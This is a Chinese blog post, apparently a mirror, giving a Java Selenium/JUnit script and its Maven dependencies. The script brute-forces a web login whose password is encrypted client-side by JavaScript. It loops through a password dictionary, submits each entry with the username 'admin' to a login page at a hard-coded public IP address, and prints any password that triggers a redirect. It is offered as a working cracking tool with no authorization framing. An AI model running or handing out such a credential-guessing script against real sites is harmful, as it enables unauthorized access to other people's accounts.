zoukankan      html  css  js  c++  java
  • 使用selenium进行密码破解(绕过账号密码JS加密)

    经常碰到网站,账号密码通过js加密后进行提交。通过burp拦截抓到的账号密码是加密后的,所以无法通过burp instruder进行破解。只能模拟浏览器填写表单并点击登录按钮进行破解。于是想到了自动化web测试工具selenium,代码如下,测试效果还不错。

    package com.example.tests;

    import java.util.regex.Pattern;
    import java.io.BufferedReader;
    import java.io.File;
    import java.io.FileInputStream;
    import java.io.FileReader;
    import java.util.concurrent.TimeUnit;
    import org.junit.*;
    import static org.junit.Assert.*;
    import static org.hamcrest.CoreMatchers.*;
    import org.openqa.selenium.*;
    import org.openqa.selenium.firefox.FirefoxDriver;
    import org.openqa.selenium.support.ui.Select;

    public class GS {
    private WebDriver driver;
    private String baseUrl;
    private boolean acceptNextAlert = true;
    private StringBuffer verificationErrors = new StringBuffer();

    @Before
    public void setUp() throws Exception {
    driver = new FirefoxDriver();
    baseUrl = "http://223.116.34.113:81/";
    driver.manage().timeouts().implicitlyWait(30, TimeUnit.SECONDS);
    }

    @Test
    public void testGS() throws Exception {

    File file = new File("C:\Users\root\Desktop\xxx\password.txt");   //加载密码字典
    FileReader fr = new FileReader(file);
    @SuppressWarnings("resource")
    BufferedReader br = new BufferedReader(fr);
    @SuppressWarnings("unused")
    String str = "";

    while ((str = br.readLine()) != null) {   //循环读取字典里的每一行
    String url = baseUrl + "/web/login.aspx?" + str;  // 后边加上str是为了每次强制刷新url,加不加看具体情况
    driver.get(url);
    driver.findElement(By.id("txt_UserID")).clear();  //清空用户名输入框
    driver.findElement(By.id("txt_UserID")).sendKeys(admin);  //设置用户名
    driver.findElement(By.id("txt_Password")).clear();  //清空密码输入框
    driver.findElement(By.id("txt_Password")).sendKeys(str);  //设置密码

    driver.findElement(By.xpath("//a/span")).click();  //模拟点击登录按钮
    Thread.sleep(1000);   //等待一秒,是否等待看具体情况。
    String cururl = driver.getCurrentUrl();   // 获取当前url
    if (!cururl.equals(url + "#")) {   //如果登录成功会跳转,则url会发生变化
    System.out.println(str);   //输入可以登录成功的密码

    }
    }
    }

    @After
    public void tearDown() throws Exception {
    driver.quit();
    String verificationErrorString = verificationErrors.toString();
    if (!"".equals(verificationErrorString)) {
    fail(verificationErrorString);
    }
    }

    private boolean isElementPresent(By by) {
    try {
    driver.findElement(by);
    return true;
    } catch (NoSuchElementException e) {
    return false;
    }
    }

    private boolean isAlertPresent() {
    try {
    driver.switchTo().alert();
    return true;
    } catch (NoAlertPresentException e) {
    return false;
    }
    }

    private String closeAlertAndGetItsText() {
    try {
    Alert alert = driver.switchTo().alert();
    String alertText = alert.getText();
    if (acceptNextAlert) {
    alert.accept();
    } else {
    alert.dismiss();
    }
    return alertText;
    } finally {
    acceptNextAlert = true;
    }
    }
    }

     以上代码依赖如下(maven):pom.xml

    <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>

    <groupId>F</groupId>
    <artifactId>F</artifactId>
    <version>0.0.1-SNAPSHOT</version>
    <packaging>jar</packaging>

    <name>F</name>
    <url>http://maven.apache.org</url>

    <properties>
    <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
    </properties>

    <dependencies>
    <dependency>
    <groupId>junit</groupId>
    <artifactId>junit</artifactId>
    <version>4.12</version>
    </dependency>

    <dependency>
    <groupId>org.seleniumhq.selenium</groupId>
    <artifactId>selenium-java</artifactId>
    <version>2.53.0</version>
    </dependency>

    <dependency>
    <groupId>org.seleniumhq.selenium</groupId>
    <artifactId>selenium-firefox-driver</artifactId>
    <version>2.53.0</version>
    </dependency>

    </dependencies>
    </project>

  • 相关阅读:
    Android应用开发——系统自带样式Android:theme
    Android权限Uri.parse的详细资料
    Android中级教程之Log图文详解(Log.v,Log.d,Log.i,Log.w,Log.e)!
    Android源码下载方法详解
    C#编程中的66个好习惯,你有多少个
    浏览时只显示指定文件类型
    如何在32位ubuntu11.10 下编译android 4.0.1源码和goldfish内核
    USACO2.3.1 The Longest Prefix 题解
    usaco1.1.3 Friday the Thirteenth 题解
    USACO 2.4.5 Fractions to Decimals 题解
  • 原文地址:https://www.cnblogs.com/fsqsec/p/5434796.html
Copyright © 2011-2022 走看看